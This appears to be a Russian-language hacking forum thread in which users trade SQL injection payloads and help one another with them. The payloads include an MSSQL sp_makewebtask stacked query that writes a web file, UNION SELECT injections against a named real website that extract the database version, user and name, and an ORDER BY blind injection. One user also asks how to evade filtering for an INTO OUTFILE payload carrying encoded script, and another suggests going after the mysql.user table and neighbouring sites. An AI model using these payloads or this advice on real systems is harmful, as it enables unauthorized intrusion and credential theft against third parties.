@SHS '; EXEC sp_makewebtask 'c:\inetpub\wwwroot\out.htm', "SELECT * FROM information_schema.COLUMNS";-- @zenon2 используй способ, который я привел в ссылке. Имхо более подоходящего не найти
Нет,но это скуля http://www.mk-computer.ru/news.php?detail=-128+union+select+1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7--
да это скуль после order by _mk-computer.ru/catalog.php?cat=1&sort=cena*(substring(version(),1,1)=4)--+
помогите тож с скуль иньектом проблема что фильтруются запрос sportID=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,CHAR(39,60,115,99,114,105,112,116,62,97 ,108,101,114,116,40,50,49,51,41,32,60,47,115,99,11 4,105,112,116,62,39),20+from+t_sports+order+by+lev el+into+outfile+'/tmp/1.txt'/* Так как путь указан с кавычками то выпрыгивает ерор: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/tmp/1.txt''/* ORDER BY Level' at line 1 Как обойти фильтрацию?
crazy~driver имеется ввиду таблица mysql.user если у юзера к ней прав нет, можно поискать скули на соседних сайтах
